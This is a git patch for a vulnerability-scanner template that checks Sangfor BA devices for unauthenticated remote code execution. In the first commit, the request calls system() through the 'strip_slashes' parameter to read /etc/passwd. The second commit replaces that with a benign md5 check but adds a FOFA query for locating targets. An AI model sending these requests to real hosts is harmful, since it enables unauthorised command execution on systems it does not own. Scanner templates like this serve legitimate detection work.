From c82ef1fb6801f4f0e8be7586a48da8e62cbea1d8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 12 May 2022 00:17:57 +0530
Subject: [PATCH 1/2] Create sangfor-ba-rce.yaml

---
 vulnerabilities/other/sangfor-ba-rce.yaml | 24 +++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 vulnerabilities/other/sangfor-ba-rce.yaml

diff --git a/vulnerabilities/other/sangfor-ba-rce.yaml b/vulnerabilities/other/sangfor-ba-rce.yaml
new file mode 100644
index 0000000000..aa4e848483
--- /dev/null
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@@ -0,0 +1,24 @@
+id: sangfor-ba-rce
+
+info:
+  name: Sangfor BA RCE
+  author: ritikchaddha
+  severity: critical
+  description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  tags: rce,sangfor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+
+      - type: status
+        status:
+          - 200

From 430cc1ea033137cb41759c03825948d0e953131f Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 23 May 2022 16:27:59 +0530
Subject: [PATCH 2/2] Update sangfor-ba-rce.yaml

---
 vulnerabilities/other/sangfor-ba-rce.yaml | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)

diff --git a/vulnerabilities/other/sangfor-ba-rce.yaml b/vulnerabilities/other/sangfor-ba-rce.yaml
index aa4e848483..cd0740ebf0 100644
--- a/vulnerabilities/other/sangfor-ba-rce.yaml
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@@ -1,23 +1,29 @@
 id: sangfor-ba-rce
 
 info:
-  name: Sangfor BA RCE
+  name: Sangfor BA - Remote Code Execution
   author: ritikchaddha
   severity: critical
-  description: A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  description: |
+    A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  reference:
+    - https://mobile.twitter.com/sec715/status/1406886851072253953
+  metadata:
+    verified: true
+    fofa-query: app="sangfor"
   tags: rce,sangfor
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=cat+/etc/passwd"
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"
 
     matchers-condition: and
     matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
+      - type: word
         part: body
+        words:
+          - '{{md5("{{randstr}}")}}'
 
       - type: status
         status: